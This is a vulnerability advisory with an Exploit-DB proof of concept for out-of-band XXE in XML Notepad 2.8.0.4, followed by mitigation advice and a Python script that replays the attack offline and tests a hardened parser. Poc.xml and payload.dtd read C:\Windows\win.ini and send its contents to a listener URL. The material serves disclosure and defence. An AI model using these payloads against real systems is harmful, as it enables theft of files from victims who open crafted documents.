Vendor: XML Notepad
By: 8-Team / daejinoh
CVSS: 8.8 (HIGH)
CWE: 611 (XML External Entity Injection)
Product Name: XML Notepad
Affected Version From: 2.8.0.4
Affected Version To: 2.8.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:xml_notepad:2.8.0.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro
Year: 2019

XML Notepad 2.8.0.4 – XML External Entity Injection

XML Notepad 2.8.0.4 resolves external entities declared in the DTD of any document it opens. An attacker who gets the victim to open a crafted XML file can therefore make the application read a file from the victim's disk and, by having the DTD build an entity whose SYSTEM URL carries that file's contents, send the contents to a server the attacker controls (an out-of-band XXE). The proof of concept below does this in two stages: Poc.xml pulls in a remote DTD through a parameter entity, and that DTD declares the entity whose URL embeds the local file. The only user action required is opening the file.

Mitigation:

Disable DTD processing for untrusted documents, or at least make sure the parser never resolves external entities. XML Notepad is a .NET application; in System.Xml that means creating the reader with XmlReaderSettings whose DtdProcessing is DtdProcessing.Prohibit (or Ignore) and whose XmlResolver is null, so that no SYSTEM identifier is ever fetched from disk or the network. Allow-listing particular entity names is not a substitute: the payload here is delivered by parameter entities inside the DTD, before any entity in the document body is consulted.

Exploit-DB raw data:

# Exploit Title: XML Notepad 2.8.0.4 - XML External Entity Injection
# Date: 2019-11-11
# Exploit Author: 8-Team / daejinoh
# Vendor Homepage:  https://www.microsoft.com/  
# Software Link:  https://github.com/microsoft/XmlNotepad  
# Version: XML Notepad 2.8.0.4
# Tested on: Windows 10 Pro
# CVE : N/A

# Step
1) File -> Open -> *.xml

# Exploit Code

1) Server(python 3.7) : python -m http.server
2) Poc.xml : 
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\Windows\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

3) payload.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
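
The chain above is easiest to follow when the parser's lookups can be watched. The Python below is an added example, not part of the Exploit-DB entry or of the XML Notepad project: it feeds the two files above to Python's expat parser (XML Notepad itself parses with .NET's System.Xml, so this is a stand-in for the technique, not the vulnerable code path), serves payload.dtd and a constructed win.ini from a dictionary instead of the network and the disk, and records every SYSTEM identifier the parser asks for. The same block shows the hardened configuration called for under Mitigation, with parameter-entity expansion off and a resolver that refuses everything, against both this out-of-band payload and a plain in-band one. The function names, the stand-in file text, the in-band document and the resource table are all constructed for the example.

```python
# Added example (not code from the exploit author or XML Notepad, which parses
# with .NET System.Xml): replay the Poc.xml / payload.dtd chain offline in expat.
import xml.parsers.expat as expat

ATTACKER_LISTENER = "http://127.0.0.1:8000?"

# Poc.xml and payload.dtd from the page (backslashes doubled for Python).
POC_XML = """<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "C:\\Windows\\win.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

PAYLOAD_DTD = """<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
"""

# Constructed stand-in for the victim's win.ini, plain words only: expat insists
# that text pulled into an entity value via an external parameter entity tokenize
# as DTD text, so real win.ini lines (';' comments, key=value) fail at that step.
FAKE_WIN_INI = "for 16-bit app support\n"

# Constructed in-band XXE document, for the hardened parser's second layer.
INLINE_XXE = """<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY leak SYSTEM "file:///C:/Windows/win.ini">
]>
<pwn>&leak;</pwn>
"""

# Stand-in for network and filesystem, keyed by SYSTEM identifier.
RESOURCES = {
    "http://127.0.0.1:8000/payload.dtd": PAYLOAD_DTD,
    "C:\\Windows\\win.ini": FAKE_WIN_INI,
}


def parse_resolving_externals(xml_text, resources):
    """Vulnerable setup: expand parameter entities and fetch every SYSTEM
    identifier. Returns the identifiers requested, in parser order."""
    requested = []

    def arm(parser):
        # A child parser must be created from the parser currently running,
        # so each parser gets a handler bound to itself.
        def on_external_ref(context, base, system_id, public_id):
            requested.append(system_id)
            body = resources.get(system_id)
            if body is None:
                return 1  # the exfil URL: the request itself is the leak
            child = parser.ExternalEntityParserCreate(context)
            arm(child)
            child.Parse(body, True)
            return 1

        parser.ExternalEntityRefHandler = on_external_ref

    root = expat.ParserCreate()
    root.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
    arm(root)
    root.Parse(xml_text, True)
    return requested


def parse_hardened(xml_text):
    """Hardened setup, the expat analogue of DtdProcessing.Prohibit plus a null
    XmlResolver: no parameter-entity expansion (so payload.dtd is never pulled
    in) and every remaining external reference refused, which aborts the parse."""
    requested = []

    def refuse(context, base, system_id, public_id):
        requested.append(system_id)
        return 0

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.ExternalEntityRefHandler = refuse
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError:
        return False, requested
    return True, requested


def leaked_content(requested, listener=ATTACKER_LISTENER):
    """What the listener logs: the callback URL's query string, i.e. the file."""
    for system_id in requested:
        if system_id and system_id.startswith(listener):
            return system_id[len(listener):]
    return None


if __name__ == "__main__":
    hits = parse_resolving_externals(POC_XML, RESOURCES)
    print(hits, repr(leaked_content(hits)), parse_hardened(POC_XML), parse_hardened(INLINE_XXE))
```

The vulnerable parser asks for payload.dtd, then for C:\Windows\win.ini, then for http://127.0.0.1:8000?<file text>; the third request is the exfiltration, with the file riding in the query string. A real HTTP client would have to encode or reject characters such as '#', '%', spaces and newlines in that URL, which is why out-of-band XXE proofs of concept pick small, plain files like win.ini. The hardened parser issues no request at all for Poc.xml, and for the in-band document it stops at the first external reference instead of reading the file.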
